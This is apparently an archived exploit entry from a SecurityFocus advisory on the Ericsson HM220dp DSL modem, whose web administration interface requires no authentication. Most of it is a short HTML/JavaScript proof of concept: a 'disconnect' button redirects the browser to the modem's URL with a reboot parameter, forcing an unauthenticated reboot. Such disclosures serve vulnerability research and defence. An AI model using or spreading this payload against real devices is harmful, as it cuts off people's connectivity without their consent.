10 lines
No EOL
470 B
Text
10 lines
No EOL
470 B
Text
source: http://www.securityfocus.com/bid/6824/info
|
|
|
|
The Ericsson HM220dp DSL Modem uses a web interface for remote administration and configuration. This interface does not require any authentication in order to access. There is no option to enable any authentication requirement.
|
|
|
|
[script]
|
|
function exploit(){
|
|
window.location = "view-source:http://www.example.com/dummy.html?reboot=1";
|
|
}
|
|
[/script]
|
|
[input type="button" value="disconnect" onClick="exploit();"] |